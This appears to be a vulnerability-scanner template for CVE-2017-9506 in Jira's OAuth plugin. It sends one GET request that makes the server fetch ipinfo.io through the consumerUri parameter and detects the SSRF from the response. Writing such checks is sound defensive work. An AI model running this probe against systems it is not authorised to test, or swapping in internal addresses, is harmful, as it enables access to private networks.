id: cve-2017-9506

info:
  name: Jira IconURIServlet SSRF
  author: Ice3man
  severity: high
  description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).

requests:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json"
    matchers:
      - type: word
        words:
          - "ipinfo.io/missingauth"
        part: body